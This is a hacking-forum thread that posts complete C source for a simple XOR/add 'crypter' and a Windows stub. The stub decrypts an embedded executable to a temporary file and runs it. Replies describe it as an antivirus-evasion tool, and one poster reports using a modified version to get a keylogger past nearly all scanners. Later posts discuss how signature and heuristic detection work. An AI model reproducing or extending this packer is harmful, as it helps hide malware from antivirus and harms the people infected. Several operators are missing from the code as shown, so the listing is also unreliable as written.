EvilZone
Programming and Scripting => C - C++ => : ca0s November 26, 2010, 05:39:30 PM
-
I made this when I was bored this summer. It cyphers files by adding or xoring one byte (user-selected). It includes a stub for working with exe's.
Crypter:
/*
Ca0s Crypt v1
Crypts files playing with bytes.
Two types:
/- Byte
^ Byte
Includes 19856 bytes stub for working with exe's. If you compile the stub and size is different, you have to
change 'stubSize' variable or set it when calling the program, with argv.
[st4ck-3rr0r.blogspot.com]
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <ctype.h>
void uso();
int isExe=0, jobMode=0, cryptMode=1, x, originalSize, stubSize=19856, error=0;
FILE *originalFile, *stubFile, *newFile;
struct stat myStat;
char *tmpCByte;
char hexConv[32]={'0', 0x00, '1', 0x01, '2', 0x02, '3', 0x03, '4', 0x04, '5', 0x05, '6', 0x06, '7', 0x07, '8', 0x08, '9', 0x09, 'A', 0x0A, 'B', 0x0B, 'C', 0x0C, 'D', 0x0D, 'E', 0x0E, 'F', 0x0F};
int main(int argc, char *argv[])
{
printf("Ca0s Crypt v1\n\n");
char *fileName, *newFileName;
char *cByte=(char *)malloc(1);
for(x=0; x<argc; x )
{
if(strcmp(argv[x], "-exe")==0) isExe=1;
if((strcmp(argv[x], "-file")==0) && (argc>(x 1))) fileName=argv[x 1];
if((strcmp(argv[x], "-w")==0) && (argc>(x 1))) newFileName=argv[x 1];
if((strcmp(argv[x], "-job")==0) && (argc>(x 1)))
{
if(strcmp(argv[x 1], "crypt")==0) jobMode=1;
else if(strcmp(argv[x 1], "decrypt")==0) jobMode=2;
}
if((strcmp(argv[x], "-crypt")==0) && (argc>(x 1)))
{
if(strcmp(argv[x 1], "1")==0) cryptMode=1; // /- 0x20
if(strcmp(argv[x 1], "2")==0) cryptMode=2; // ^0x20
}
if((strcmp(argv[x], "-byte")==0) && (argc>(x 1)))
{
if(strlen(argv[x 1])==2)
{
tmpCByte=(char *)malloc(1);
*tmpCByte=0x00;
char *argByte=(char *)malloc(2);
memcpy(argByte, argv[x 1], 2);
char *conversion=(char *)malloc(1);
int y=0, z=0, good=0;
for(y=0; y<=1; y )
{
good=0;
memcpy(conversion, argByte y, 1);
for(z=0; z<31; z )
{
if(toupper(*conversion) == hexConv[z])
{
good=1;
if((y==0) && (hexConv[z 1]!=0x00)) *tmpCByte =hexConv[z 1]*16;
else *tmpCByte =hexConv[z 1];
break;
}
}
if(good==0)
{
error=1;
break;
}
}
}
else error=1;
}
if((strcmp(argv[x], "-stubsize")==0) && (argc>(x 1))) stubSize=atoi(argv[x 1]);
}
if((fileName==NULL) || (newFileName==NULL) ||(jobMode==0) || (error==1)) uso();
printf("Original file: %s\n", fileName);
originalFile=fopen(fileName, "rb");
if(originalFile==NULL)
{
printf("Error: can't open file to crypt.\n");
return 0;
}
fstat(fileno(originalFile), &myStat);
originalSize=myStat.st_size;
printf("Size: %d bytes.\n", originalSize);
newFile=fopen(newFileName, "wb");
if(newFile==NULL)
{
printf("Error: can't create output file.\n");
return 0;
}
if(jobMode==1) printf("Job: crypt.\n");
else if(jobMode==2) printf("Job: decrypt.\n");
if(cryptMode==1) printf("Mode: /- BYTE\n");
else if(cryptMode==2) printf("Mode: ^ BYTE\n");
if(tmpCByte==NULL)
{
*cByte=0x20;
printf("Using default byte (0x20).\n");
}
else
{
cByte=tmpCByte;
printf("Using byte 0x%x.\n", (unsigned char)*cByte);
}
if(isExe==1) printf("Working with a EXE. Using stub.\n");
if((isExe==1) && (jobMode==2))
{
printf("Stub's size: %d bytes.\n", stubSize);
stubSize =2;
}
char *originalBuffer=(char *)malloc(originalSize);
char *tmpByte1=(char *)malloc(1);
char *tmpByte2=(char *)malloc(1);
fread(originalBuffer, originalSize, 1, originalFile);
if((isExe==1) && (jobMode==1))
{
char *modeByte=(char *)malloc(1);
switch(cryptMode)
{
case 1:
*modeByte=0x01;
break;
case 2:
*modeByte=0x02;
break;
}
FILE *myStub=fopen("stub.exe", "rb");
if(myStub==NULL)
{
printf("Error: can't open stub.\n");
return 0;
}
while(fread(tmpByte2, 1, 1, myStub)) fwrite(tmpByte2, 1, 1, newFile);
fclose(myStub);
fwrite(modeByte, 1, 1, newFile);
fwrite(cByte, 1, 1, newFile);
}
if((isExe==1) && (jobMode==2))
{
originalBuffer =stubSize;
originalSize-=stubSize;
}
for(x=0; x<originalSize; x )
{
memcpy(tmpByte1, originalBuffer x, 1);
if(jobMode==1)
{
switch(cryptMode)
{
case 1:
*tmpByte1 =*cByte;
break;
case 2:
*tmpByte1^=*cByte;
break;
}
fwrite(tmpByte1, 1, 1, newFile);
}
else if(jobMode==2)
{
switch(cryptMode)
{
case 1:
*tmpByte1-=*cByte;
break;
case 2:
*tmpByte1^=*cByte;
break;
}
fwrite(tmpByte1, 1, 1, newFile);
}
}
fclose(originalFile);
fclose(newFile);
printf("\nTerminado. Archivo creado en %s\n", newFileName);
return 0;
}
void uso()
{
printf("Mandatory args:\n\t-file PATH\t\tSets file to crypt\n\t-w PATH\t\t\tSets output file\n\t-job [crypt|decrypt]\tWhat to do\n");
printf("Optional args:\n\t-exe\t\t\tInclude stub, for exe's\n\t-byte BYTE (00-FF)\tChanges crypt-byte (default 0x20)\n\t-crypt 1/2\t\tCrypt mode. 1( -BYTE) 2(^BYTE)\n\t-stubsize SIZE\tSets stub size when working with a exe. Default: 19856\n");
exit(0);
}
Stub:
/*
Stub para Ca0s Crypt v1
If you modify source source, change MySize to new size in bytes
[st4ck-3rr0r.blogspor.com]
*/
#include <sys/stat.h>
#include <windows.h>
#include <stdio.h>
#include <io.h>
#include <process.h>
#define MySize 19856
FILE *mySelf, *tmpFile;
struct stat myStat;
char myName[MAX_PATH], tmpName[MAX_PATH];
int embedSize, x;
char *myByte, *modeByte, *cByte;
int main()
{
GetModuleFileName(NULL, myName, sizeof(myName));
stat(myName, &myStat);
embedSize=myStat.st_size-MySize;
mySelf=fopen(myName, "rb");
lseek(fileno(mySelf), MySize, SEEK_SET);
tmpnam(tmpName);
tmpFile=fopen(tmpName, "wb");
myByte=(char *)malloc(1);
modeByte=(char *)malloc(1);
cByte=(char *)malloc(1);
fread(modeByte, 1, 1, mySelf); /// Crypt mode
fread(cByte, 1, 1, mySelf); // Crypt byte
for(x=0; x<embedSize; x )
{
fread(myByte, 1, 1, mySelf);
if(*modeByte==0x01)
*myByte-=*cByte;
if(*modeByte==0x02)
*myByte^=*cByte;
fwrite(myByte, 1, 1, tmpFile);
}
fclose(mySelf);
fclose(tmpFile);
char *execPath[2];
execPath[0]=tmpName;
execPath[1]=NULL;
execve(execPath[0], execPath, NULL);
return 0;
}
Mandatory args:
-file PATH -> Sets file to crypt
-w PATH -> Sets output file
-job [crypt|decrypt] -> What to do
Optional args:
-exe -> Include stub, for exe's
-byte BYTE (00-FF) -> Changes crypt-byte (default 0x20)
-crypt 1/2 -> Crypt mode. 1( -BYTE) 2(^BYTE)
-stubsize SIZE -> Sets stub size when working with a exe. Default: 19856
-
Great for people looking for open source crypter.
Thanks for sharing.
-
Note: Its a scantime crypter, not runtime. But still a good example :)
-
Note: Its a scantime crypter, not runtime. But still a good example :)
What you mean by "scantime" & "runtime"?
-
What you mean by "scantime" & "runtime"?
A scantime crypter will only "protect/crypt" your file when the file is not running. Once you run it, most AV's will detect the temporarily created file. A runtime crypter will make the file undetectable at all times.
-
A scantime crypter will only "protect/crypt" your file when the file is not running. Once you run it, most AV's will detect the temporarily created file. A runtime crypter will make the file undetectable at all times.
It's not that hard to modify to make it a runtime crypter.
-
This is awesome bro. I will for sure use this as an example :)
-
I hate looking at my own code from some years ago, I almost always find it awful. But thanks :P
-
This is awesome bro. I will for sure use this as an example :)
What are you working on. I was planning to create something like this for my encoder/decoder.
-
I doubt that OP will ever read it, but still: THANKS for sharing this! I learned quite a bit about the stub crypting concept
Here's ca0s crypt v2.0, written by me: https://evilzone.org/programming-newbies/%28c-source%29-cli-stub-crypter-%28noobfriendly%29/msg106155/#msg106155
I hope you don't feel copy&pasted or anything :P and that it was okay to re-use your name
Cheers buddy
-
A scantime crypter will only "protect/crypt" your file when the file is not running. Once you run it, most AV's will detect the temporarily created file. A runtime crypter will make the file undetectable at all times.
Actually "runtime crypted" files are still detectable in memory.
These terms are misnomers imo. They should call it temp file execution vs in-memory execution or something similar, but not "scantime/runtime protected".
-
I doubt that OP will ever read it, but still: THANKS for sharing this! I learned quite a bit about the stub crypting concept
no
Well, I'm glad you actually found that piece of crap that was my "crypter" useful . It was just a damn simple and naive example implementation.
I hope you don't feel copy&pasted or anything :P and that it was okay to re-use your name
Cheers buddy
Nah, no problem.
For the next version, if you are going to continue developing it, you could try to avoid writing the original file into disk and just use the same process as the stub, for example.
-
yo mate! congratz for still being alive
It was just a damn simple and naive example implementation.
And that's why it perfectly fitted my needs :D i.e. abilities. Many other stub sources I've found were either .net crap or just way above my comprehension skill. (But since you helped me understanding general stub concepts, they're not so hard to analyze anymore. Thus I've already got sum new projects in the pipeline ;) )
Nah, no problem.
<3
For the next version, if you are going to continue developing it, you could try to avoid writing the original file into disk and just use the same process as the stub, for example.
Already done (something similar), haha, but thanks for the hint. The code I've posted is actually just the educational version, addressing interested newbes whose brain is as slow as mine xP
However, after a few minor improvements, this script can do surprisingly well! Just got a 1/33 on nodistribute with some generic keylogger, hihi
Anyway, thanks again :3 keep it up bro
-
Already done (something similar), haha, but thanks for the hint. The code I've posted is actually just the educational version, addressing interested newbes whose brain is as slow as mine xP
However, after a few minor improvements, this script can do surprisingly well! Just got a 1/33 on nodistribute with some generic keylogger, hihi
Anyway, thanks again :3 keep it up bro
For all the work put into AV systems there is a lot of stupid simple ways to defeat just a generic static-scan, the harder stuff is defeating properly implemented (both software and user wise) live monitoring (why is this program opening a socket, is this allowed, etc)
-
For all the work put into AV systems there is a lot of stupid simple ways to defeat just a generic static-scan, the harder stuff is defeating properly implemented (both software and user wise) live monitoring (why is this program opening a socket, is this allowed, etc)
Ye, still shocked that some basic knowledge is all one needs to bypass em. I don't want to imagine what some of the more experienced people could achieve... this shit kicked my paranoia up to a whole new level >.<
-
Ye, still shocked that some basic knowledge is all one needs to bypass em. I don't want to imagine what some of the more experienced people could achieve... this shit kicked my paranoia up to a whole new level >.<
That's the problem with signature based scanning ( simple file scanning for example ) all one needs to do is write their own code and payload, if that even ( sometimes as simple as stripping all the comment out of the code ). Heuristic scanning takes it a step further and looks for behavior in a virtual machine (some decompile and examine the code) but it can't lock out all attempts to say hook your keyboard driver as legitimate applications do this as well. Correct me if I'm wrong, but I believe I've explained properly :)
The scary shit happens in Ring 0 ;)
-
That's the problem with signature based scanning ( simple file scanning for example ) all one needs to do is write their own code and payload, if that even ( sometimes as simple as stripping all the comment out of the code )
No one complains that a fork is not really good for eating soup.
Signatures are just one part of the arsenal and should be treated as that. They are not problematic, they are just not suitable for everything.
Heuristic scanning takes it a step further and looks for behavior in a virtual machine
Heuristics and the way of how you obtain information are completely separate. You may use behavioural information, but you may also use anything else, like the structure of the file, the code, etc. Heuristics just describes how you use the information (see also this article (https://en.wikipedia.org/wiki/Heuristic_%28computer_science%29)).
What you mean is emulation in a sandbox, which can be and often is combined with heuristics.
(some decompile and examine the code)
Decompilation is done for humans only, computers don't need it. It does not add any information for automatic code examination. So, no, I don't believe that.
-
Decompilation is done for humans only, computers don't need it. It does not add any information for automatic code examination. So, no, I don't believe that.
Well at least some analysis techniques used for decompilation are useful in other contexts, too. For example, a call- or
controlflow-graph might be more useful than raw assembly code. So maybe B1N4RY2.0 meant "obtaining more high-level and thus abstract information" when (s)he said "decompiling".
Anyway, your post was very concise and informative. +1
-
No one complains that a fork is not really good for eating soup.
Signatures are just one part of the arsenal and should be treated as that. They are not problematic, they are just not suitable for everything.
Never said they in themselves are problematic. Just that they can easily be bypassed, which is a problem specific to the task they perform. Nothing more :)
Heuristics and the way of how you obtain information are completely separate. You may use behavioural information, but you may also use anything else, like the structure of the file, the code, etc. Heuristics just describes how you use the information (see also this article (https://en.wikipedia.org/wiki/Heuristic_%28computer_science%29)).
What you mean is emulation in a sandbox, which can be and often is combined with heuristics.
I should have expanded upon this with a simple "etc" after behavioral scanning, didn't mean to imply heuristics was interchangeable.
Decompilation is done for humans only, computers don't need it. It does not add any information for automatic code examination. So, no, I don't believe that.
As for this one, I was under the impression some try to decompile the code for further analysis, maybe not?
-
As for this one, I was under the impression some try to decompile the code for further analysis, maybe not?
Well, like I said. The code does not contain more information if you decompile it. It is just a better structure for a human to read. Malware analysts will of course decompile code, but I don't see any use for an antivirus product in doing that. It will unpack and analyse code, but the code does not need to be in that human friendly form to do so.
-
Well, like I said. The code does not contain more information if you decompile it. It is just a better structure for a human to read. Malware analysts will of course decompile code, but I don't see any use for an antivirus product in doing that. It will unpack and analyse code, but the code does not need to be in that human friendly form to do so.
Ah ya gotcha, never really thought about why it would decompile it ( talking the AV itself, not for like you said "human" readability ) So I'm sure I either misread or mistook what I read something lol :D